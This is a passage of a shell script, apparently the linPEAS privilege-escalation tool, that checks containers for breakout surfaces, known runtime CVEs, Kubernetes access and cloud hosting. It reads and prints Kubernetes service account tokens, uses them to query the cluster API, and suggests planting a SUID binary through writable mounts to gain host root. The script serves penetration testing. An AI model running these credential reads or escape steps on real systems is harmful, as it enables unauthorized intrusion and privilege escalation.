   4808 if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ] && [ "$nerdctlcontainers" -eq "0" ] && [ "$crictlcontainers" -eq "0" ] && [ "$ctrcontainers" -eq "0" ]; then
   4809     echo_no
   4810 else
   4811     containerCounts=""
   4812     if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
   4813     if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
   4814     if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
   4815     if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
   4816     if [ "$nerdctlcontainers" -ne "0" ]; then containerCounts="${containerCounts}nerdctl($nerdctlcontainers) "; fi
   4817     if [ "$crictlcontainers" -ne "0" ]; then containerCounts="${containerCounts}crictl($crictlcontainers) "; fi
   4818     if [ "$ctrcontainers" -ne "0" ]; then containerCounts="${containerCounts}ctr($ctrcontainers) "; fi
   4819     echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
   4820     # List any running containers with more details
   4821     print_running_containers "$dockercontainers" "Running Docker Containers" docker ps -a
   4822     print_running_containers "$podmancontainers" "Running Podman Containers" podman ps -a
   4823     print_running_containers "$lxccontainers" "Running LXC Containers" lxc list
   4824     print_running_containers "$rktcontainers" "Running RKT Containers" rkt list
   4825     print_running_containers "$nerdctlcontainers" "Running nerdctl Containers" nerdctl ps -a
   4826     print_running_containers "$crictlcontainers" "Running CRI Containers" crictl ps -a
   4827     print_running_containers "$ctrcontainers" "Running ctr Containers (k8s.io namespace)" ctr -n k8s.io containers list
   4828 fi
   4829 echo ""
   4830 
   4831 fi
   4832 
   4833 if check_mitre_filter "T1613"; then
   4834 #If docker
   4835 if echo "$containerType" | grep -qi "docker"; then
   4836     print_2title "Docker Container details" "T1613"
   4837     inDockerGroup
   4838     print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4839     print_list "Looking and enumerating runtime sockets:\n"$NC
   4840     enumerateDockerSockets
   4841     print_list "Docker version .................$NC$dockerVersion"
   4842     checkDockerVersionExploits
   4843     print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4844     print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4845     print_list "Vulnerable to CVE-2021-41091 ...$NC$VULN_CVE_2021_41091"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4846     if [ "$inContainer" ]; then
   4847         checkDockerRootless
   4848         print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
   4849         print_list "Checking Docker Desktop internal Engine API (CVE-2025-9074):\n"$NC
   4850         enumerateDockerDesktopAPI
   4851         echo ""
   4852     fi
   4853     if df -h | grep docker; then
   4854         print_2title "Docker Overlays" "T1613"
   4855         df -h | grep docker
   4856     fi
   4857 fi
   4858 
   4859 fi
   4860 
   4861 if check_mitre_filter "T1611"; then
   4862 if [ "$inContainer" ]; then
   4863     echo ""
   4864     print_2title "Container & breakout enumeration" "T1611"
   4865     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/index.html"
   4866     # Basic container info
   4867     print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
   4868     if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
   4869         print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
   4870     fi
   4871     # Hardening and isolation controls
   4872     print_3title "Hardening & isolation" "T1611"
   4873     seccomp_mode_num="$(awk '/^Seccomp:/{print $2}' /proc/self/status 2>/dev/null)"
   4874     seccomp_mode_desc="unknown"
   4875     case "$seccomp_mode_num" in
   4876       0) seccomp_mode_desc="disabled" ;;
   4877       1) seccomp_mode_desc="strict" ;;
   4878       2) seccomp_mode_desc="filtering" ;;
   4879     esac
   4880     print_list "Seccomp mode ................... "$NC
   4881     (printf "%s (%s)\n" "$seccomp_mode_desc" "${seccomp_mode_num:-?}") | sed "s,disabled,${SED_RED}," | sed "s,strict,${SED_RED_YELLOW}," | sed "s,filtering,${SED_GREEN},"
   4882     if grep -q "^Seccomp_filters:" /proc/self/status 2>/dev/null; then
   4883       print_list "Seccomp filters ............... "$NC
   4884       awk '/^Seccomp_filters:/{print $2}' /proc/self/status 2>/dev/null | sed -${E} "s,^[0-9]+$,${SED_GREEN}&,"
   4885     fi
   4886     no_new_privs_num="$(awk '/^NoNewPrivs:/{print $2}' /proc/self/status 2>/dev/null)"
   4887     print_list "NoNewPrivs ..................... "$NC
   4888     case "$no_new_privs_num" in
   4889       1) printf "enabled (1)\n" | sed -${E} "s,enabled,${SED_GREEN}," ;;
   4890       0) printf "disabled (0)\n" | sed -${E} "s,disabled,${SED_RED_YELLOW}," ;;
   4891       *) printf "unknown\n" ;;
   4892     esac
   4893     print_list "AppArmor profile ............... "$NC
   4894     (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
   4895     selinux_status="disabled"
   4896     if command -v getenforce >/dev/null 2>&1; then
   4897         selinux_status="$(getenforce 2>/dev/null || echo disabled)"
   4898     elif [ -r /sys/fs/selinux/enforce ]; then
   4899         if [ "$(cat /sys/fs/selinux/enforce 2>/dev/null)" = "1" ]; then
   4900             selinux_status="Enforcing"
   4901         else
   4902             selinux_status="Permissive"
   4903         fi
   4904     fi
   4905     print_list "SELinux status ................. "$NC
   4906     printf "%s\n" "$selinux_status" | sed -${E} "s,Enforcing,${SED_GREEN},g" | sed -${E} "s,Permissive,${SED_RED_YELLOW},g" | sed -${E} "s,disabled,${SED_RED},g"
   4907     selinux_context="$(cat /proc/self/attr/current 2>/dev/null | grep -E ':' || true)"
   4908     if [ "$selinux_context" ]; then
   4909         print_list "SELinux context ................ "$NC
   4910         printf "%s\n" "$selinux_context" | sed -${E} "s,container_t|spc_t,${SED_RED_YELLOW}&,g"
   4911     fi
   4912     uid_map_value="$(cat /proc/self/uid_map 2>/dev/null)"
   4913     gid_map_value="$(cat /proc/self/gid_map 2>/dev/null)"
   4914     setgroups_value="$(cat /proc/self/setgroups 2>/dev/null)"
   4915     print_list "User namespace mappings ....... "$NC
   4916     if echo "$uid_map_value" | grep -Eq "^[[:space:]]*0[[:space:]]+0[[:space:]]+4294967295[[:space:]]*$"; then
   4917         echo "initial user namespace" | sed -${E} "s,initial user namespace,${SED_RED_YELLOW},"
   4918     elif [ "$uid_map_value" ]; then
   4919         echo "remapped user namespace" | sed -${E} "s,remapped user namespace,${SED_GREEN},"
   4920     else
   4921         echo "unknown"
   4922     fi
   4923     if [ "$uid_map_value" ]; then
   4924         echo "  UID map (container -> host -> range):"
   4925         echo "$uid_map_value" | awk '{print "  " $1 " -> " $2 " -> " $3}'
   4926     fi
   4927     if [ "$gid_map_value" ]; then
   4928         echo "  GID map (container -> host -> range):"
   4929         echo "$gid_map_value" | awk '{print "  " $1 " -> " $2 " -> " $3}'
   4930     fi
   4931     if [ "$setgroups_value" ]; then
   4932         echo "  setgroups: $setgroups_value"
   4933     fi
   4934     # Known vulnerabilities
   4935     print_3title "Known Vulnerabilities" "T1611"
   4936     checkContainerExploits
   4937     print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4938     # Check for container escape tools
   4939     container_breakout_tools="$(
   4940       for tool in nsenter unshare chroot capsh setcap getcap docker kubectl ctr runc containerd crio podman lxc rkt nerdctl; do
   4941         command -v "$tool" 2>/dev/null
   4942       done
   4943     )"
   4944     print_list "Container escape tools present . "$NC
   4945     if [ "$container_breakout_tools" ]; then
   4946         printf "%s\n" "$container_breakout_tools" | sed -${E} "s,.*,${SED_RED}&,"
   4947     else
   4948         echo "No"
   4949     fi
   4950     # Runtime vulnerabilities
   4951     print_3title "Runtime Vulnerabilities" "T1611"
   4952     # Check for known runtime vulnerabilities
   4953     if [ "$(command -v runc || echo -n '')" ]; then
   4954         print_list "Runc version ................. "$NC
   4955         warn_exec runc --version
   4956         # Check for specific runc vulnerabilities
   4957         runc_version=$(runc --version 2>/dev/null | grep -i "version" | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
   4958         if [ "$runc_version" ]; then
   4959             print_list "Runc CVE-2019-5736 ........... "$NC
   4960             if [ "$(echo $runc_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 0) || ($1 == 1 && $2 == 0 && $3 < 7)) print "Yes"; else print "No"; }')" = "Yes" ]; then
   4961                 echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
   4962             else
   4963                 echo "No"
   4964             fi
   4965         fi
   4966     fi
   4967     if [ "$(command -v containerd || echo -n '')" ]; then
   4968         print_list "Containerd version ........... "$NC
   4969         warn_exec containerd --version
   4970         # Check for specific containerd vulnerabilities
   4971         containerd_version=$(containerd --version 2>/dev/null | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
   4972         if [ "$containerd_version" ]; then
   4973             print_list "Containerd CVE-2020-15257 ..... "$NC
   4974             if [ "$(echo $containerd_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 4) || ($1 == 1 && $2 == 4 && $3 < 3)) print "Yes"; else print "No"; }')" = "Yes" ]; then
   4975                 echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
   4976             else
   4977                 echo "No"
   4978             fi
   4979         fi
   4980     fi
   4981     # Mount, procfs and sysfs escape surfaces
   4982     print_3title "Mount, procfs & sysfs surfaces" "T1611"
   4983     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/sensitive-host-mounts.html"
   4984     checkProcSysBreakouts
   4985     root_mount_mode="$(awk '$5=="/"{print $6; exit}' /proc/self/mountinfo 2>/dev/null | cut -d',' -f1)"
   4986     print_list "/proc heavily populated ........ $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4987     print_list "/dev heavily populated ......... $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4988     print_list "Root filesystem mode ........... ${root_mount_mode:-unknown}\n" | sed -${E} "s,rw,${SED_RED_YELLOW}," | sed -${E} "s,ro,${SED_GREEN},"
   4989     print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
   4990     print_list "release_agent surface 1 ........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
   4991     print_list "release_agent surface 2 ........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4992     print_list "release_agent surface 3 ........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4993     print_list "Writable core_pattern .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4994     print_list "Writable binfmt_misc/register .. $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4995     print_list "Writable uevent_helper ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   4996     # Additional mount checks
   4997     print_list "Mounted runtime sockets ........ "$NC
   4998     (mount | grep -E "docker.sock|containerd.sock|crio.sock|podman.sock|buildkitd.sock|kubelet.sock|firecracker-containerd.sock" || echo "No") | sed -${E} "s,docker.sock|containerd.sock|crio.sock|podman.sock|buildkitd.sock|kubelet.sock|firecracker-containerd.sock,${SED_RED},g"
   4999     print_list "Common host filesystem mounted?  "$NC
   5000     (mount | grep -E "host|/host|/mnt/host|/rootfs" || echo "No") | sed -${E} "s,host|/host|/mnt/host|/rootfs,${SED_RED},g"
   5001     print_list "Interesting mounts ............. "$NC
   5002     mount | grep -E "docker|container|overlay|kubelet|buildkit|crio|podman|/host|/rootfs" | grep -v "proc" | sed -${E} "s,docker.sock|containerd.sock|crio.sock|podman.sock|kubelet.sock|buildkitd.sock|host|rootfs|privileged,${SED_RED},g"
   5003     # Check for writable mount points
   5004     print_list "Writable mount points ......... "$NC
   5005     mount | grep -E "rw," | grep -v "ro," | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
   5006     # Check for shared mount points
   5007     print_list "Shared mount points ........... "$NC
   5008     mount | grep -E "shared|slave" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
   5009     # Capability checks
   5010     print_3title "Capability Checks" "T1611"
   5011     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/protections/capabilities.html"
   5012     print_list "Dangerous capabilities ......... "$NC
   5013     if [ "$(command -v capsh || echo -n '')" ]; then 
   5014         capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
   5015     else
   5016         defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
   5017         cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
   5018         echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
   5019     fi
   5020     print_list "Ambient capabilities ........... "$NC
   5021     (grep "CapAmb:" /proc/self/status 2>/dev/null | grep -v "0000000000000000" | sed "s,CapAmb:.,," || echo "No") | sed -${E} "s,No,${SED_GREEN}," | sed -${E} "s,[0-9a-fA-F]\+,${SED_RED}&,"
   5022     # Additional capability checks
   5023     print_list "ptrace_scope (host) ........... "$NC
   5024     if [ -f "/proc/sys/kernel/yama/ptrace_scope" ]; then
   5025         (cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "Not found") | sed -${E} "s,0,${SED_RED},"
   5026     else
   5027         echo "Not found"
   5028     fi
   5029     # Namespace checks. From inside a container we often cannot prove host namespace sharing directly,
   5030     # so prefer raw namespace handles and practical indicators over misleading "host namespace = yes/no" guesses.
   5031     print_3title "Namespaces & sharing indicators" "T1611"
   5032     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/protections/namespaces/index.html"
   5033     print_list "Current namespaces ............. "$NC
   5034     ls -l /proc/self/ns/
   5035     if ps -e -o pid= >/dev/null 2>&1; then
   5036         host_process_count="$(ps -e -o pid= 2>/dev/null | wc -l | tr -d ' ')"
   5037         host_process_indicators="$(ps -eo comm= 2>/dev/null | grep -E '^(systemd|init|kthreadd|dockerd|containerd|kubelet|sshd|udevd|NetworkManager|dbus-daemon)$' | sort -u)"
   5038     else
   5039         host_process_count="$(ls -d /proc/[0-9]* 2>/dev/null | wc -l | tr -d ' ')"
   5040         host_process_indicators="$(for proc_comm in /proc/[0-9]*/comm; do cat "$proc_comm" 2>/dev/null; done | grep -E '^(systemd|init|kthreadd|dockerd|containerd|kubelet|sshd|udevd|NetworkManager|dbus-daemon)$' | sort -u)"
   5041     fi
   5042     print_list "Processes visible .............. $host_process_count\n" | sed -${E} "s,^[^0-9]*([5-9][0-9]|[1-9][0-9]{2,}).*,${SED_RED_YELLOW}&,"
   5043     print_list "Host-like processes visible .... "$NC
   5044     if [ "$host_process_indicators" ]; then
   5045         printf "%s\n" "$host_process_indicators" | sed -${E} "s,.*,${SED_RED_YELLOW}&,"
   5046     else
   5047         echo "No obvious host daemons"
   5048     fi
   5049     print_list "Network interfaces ............. "$NC
   5050     if command -v ip >/dev/null 2>&1; then
   5051         ip -o link show 2>/dev/null | awk -F': ' '{print $2}'
   5052     else
   5053         ls /sys/class/net 2>/dev/null
   5054     fi
   5055     print_list "Namespace inode summary ........ "$NC
   5056     for ns in cgroup ipc mnt net pid time user uts; do
   5057         if [ -L "/proc/self/ns/$ns" ]; then
   5058             printf "%s -> %s\n" "$ns" "$(readlink "/proc/self/ns/$ns" 2>/dev/null)"
   5059         fi
   5060     done
   5061     print_list "Looking and enumerating runtime sockets:\n"$NC
   5062     enumerateDockerSockets
   5063     # Additional breakout vectors
   5064     print_3title "Writable kernel helper paths" "T1611"
   5065     print_list "modprobe helper binary ......... $modprobe_binary\n" | sed -${E} "s,/.*,${SED_RED},"
   5066     print_list "modprobe path writable ......... $modprobe_config_writable\n" | sed -${E} "s,Yes,${SED_RED},"
   5067     print_list "panic_on_oom writable .......... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
   5068     print_list "suid_dumpable writable ......... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
   5069     print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
   5070     print_3title "Sensitive procfs/sysfs exposure" "T1611"
   5071     print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5072     print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5073     print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5074     print_list "/proc/keys readable ............ $proc_keys_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5075     print_list "/proc/timer_list readable ...... $proc_timer_list_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5076     print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5077     print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5078     print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5079     print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5080     print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5081     print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
   5082     print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5083     print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
   5084     print_list "/sys/firmware readable ......... $sys_firmware_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5085     print_list "/sys/kernel/debug present ...... $debugfs_present\n" | sed -${E} "s,Yes,${SED_RED},"
   5086     print_list "/sys/kernel/debug readable ..... $debugfs_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5087     print_list "/sys/class/thermal present ..... $thermal_present\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   5088     print_list "/sys/class/thermal readable .... $thermal_readable\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
   5089     print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
   5090     print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
   5091     print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
   5092     print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
   5093     print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
   5094     # Additional kernel checks
   5095     print_list "Kernel version .............. "$NC
   5096     uname -a | sed -${E} "s,$(uname -r),${SED_RED},"
   5097     print_list "Kernel modules ............. "$NC
   5098     if command -v lsmod >/dev/null 2>&1; then
   5099         lsmod | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g"
   5100     elif [ -r /proc/modules ]; then
   5101         cat /proc/modules | grep -E "overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio" | sed -${E} "s,overlay|aufs|btrfs|device_mapper|floppy|loop|squashfs|udf|veth|vbox|vmware|kvm|xen|docker|containerd|runc|crio,${SED_RED},g"
   5102     else
   5103         echo_not_found "lsmod and /proc/modules"
   5104     fi
   5105     # Additional container runtime checks
   5106     print_list "Container runtime sockets .. "$NC
   5107     (find /var/run /run -name "*.sock" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker,${SED_RED},g"
   5108     print_list "Container runtime configs .. "$NC
   5109     (find /etc -name "*.conf" -o -name "*.json" 2>/dev/null | grep -E "docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker" || echo "No") | sed -${E} "s,docker|containerd|crio|podman|lxc|rkt|kubelet|buildkit|firecracker,${SED_RED},g"
   5110     # Kubernetes specific checks
   5111     if echo "$containerType" | grep -qi "kubernetes"; then
   5112         print_3title "Kubernetes Specific Checks" "T1611"
   5113         print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
   5114         print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
   5115         print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
   5116         print_list "Kubernetes service account folder" | sed -${E} "s,.*,${SED_RED},"
   5117         ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
   5118         print_list "Kubernetes env vars" | sed -${E} "s,.*,${SED_RED},"
   5119         (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
   5120         print_list "Current sa user k8s permissions" | sed -${E} "s,.*,${SED_RED},"
   5121         kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
   5122           "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
   5123             -X 'POST' -H 'Content-Type: application/json' \
   5124             --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
   5125         # Additional Kubernetes checks
   5126         print_list "Kubernetes API server ...... "$NC
   5127         (curl -s -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
   5128         print_list "Kubernetes secrets ......... "$NC
   5129         (kubectl get secrets 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
   5130         print_list "Kubernetes pods ............ "$NC
   5131         (kubectl get pods 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
   5132         print_list "Kubernetes services ........ "$NC
   5133         (kubectl get services 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
   5134         print_list "Kubernetes nodes ........... "$NC
   5135         (kubectl get nodes 2>/dev/null || echo "Not accessible") | sed -${E} "s,Not accessible,${SED_GREEN},"
   5136     fi
   5137     # Interesting files and mounts
   5138     print_3title "Interesting Files & Mounts" "T1611"
   5139     print_list "Interesting files mounted ........ "$NC
   5140     (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
   5141     print_list "Possible entrypoints ........... "$NC
   5142     ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
   5143     echo ""
   5144 fi
   5145 
   5146 fi
   5147 
   5148 if check_mitre_filter "T1611"; then
   5149 containerCheck
   5150 if [ "$inContainer" ]; then
   5151   echo ""
   5152   print_2title "Container - Writable bind mounts w/o nosuid (SUID persistence risk)" "T1611"
   5153   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/privileged-containers.html#writable-bind-mounts"
   5154   if [ -r /proc/self/mountinfo ]; then
   5155     CT_RW_bind_mounts_matches=$(grep -E "(^| )bind( |$)" /proc/self/mountinfo 2>/dev/null | grep -E "(^|,)rw(,|$)" | grep -v "nosuid" || true)
   5156   else
   5157     CT_RW_bind_mounts_matches=$(mount -l 2>/dev/null | grep -E "bind" | grep -E "(^|,)rw(,|$)" | grep -v "nosuid" || true)
   5158   fi
   5159   if [ -z "$CT_RW_bind_mounts_matches" ]; then
   5160     print_list "Writable bind mounts without nosuid ............ No"
   5161   else
   5162     print_list "Writable bind mounts without nosuid ............ Yes" | sed -${E} "s,Yes,${SED_RED},"
   5163     echo "$CT_RW_bind_mounts_matches" | sed -${E} "s,/proc/self/mountinfo,${SED_GREEN},"
   5164     echo ""
   5165     if [ "$(id -u 2>/dev/null)" = "0" ]; then
   5166       print_list "Note"; echo ": You are root inside a container and there are writable bind mounts without nosuid." | sed -${E} "s,.*,${SED_RED},"
   5167       echo "  If the path is shared with the host and executable there, you may plant a SUID binary (e.g., copy /bin/bash and chmod 6777)"
   5168       echo "  and execute it from the host to obtain root. Ensure proper authorization before testing."
   5169     else
   5170       print_list "Note"; echo ": Current user is not root; if you obtain container root, these mounts may enable host escalation via SUID planting." | sed -${E} "s,.*,${SED_RED},"
   5171     fi
   5172   fi
   5173   echo ""
   5174 fi
   5175 
   5176 fi
   5177 
   5178 fi
   5179 
   5180 fi
   5181 echo ''
   5182 echo ''
   5183 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
   5184 
   5185 if echo $CHECKS | grep -q cloud; then
   5186 if check_mitre_filter "T1552.005,T1580"; then
   5187 print_title "Cloud"
   5188 check_gcp
   5189 check_aws_ecs
   5190 check_aws_ec2
   5191 check_aws_lambda
   5192 check_aws_codebuild
   5193 check_do
   5194 check_ibm_vm
   5195 check_az_vm
   5196 check_az_app
   5197 check_az_automation_acc
   5198 check_aliyun_ecs
   5199 check_tencent_cvm
   5200 if check_mitre_filter "T1580"; then
   5201 printf "${YELLOW}Learn and practice cloud hacking techniques in ${BLUE}https://training.hacktricks.xyz\n"$NC
   5202 echo ""
   5203 print_list "GCP Virtual Machine? ................. $is_gcp_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5204 print_list "GCP Cloud Funtion? ................... $is_gcp_function\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5205 print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5206 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5207 print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5208 print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5209 print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5210 print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5211 print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5212 print_list "Azure VM or Az metadata? ............. $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5213 print_list "Azure APP or IDENTITY_ENDPOINT? ...... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5214 print_list "Azure Automation Account? ............ $is_az_automation_acc\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5215 print_list "Aliyun ECS? .......................... $is_aliyun_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
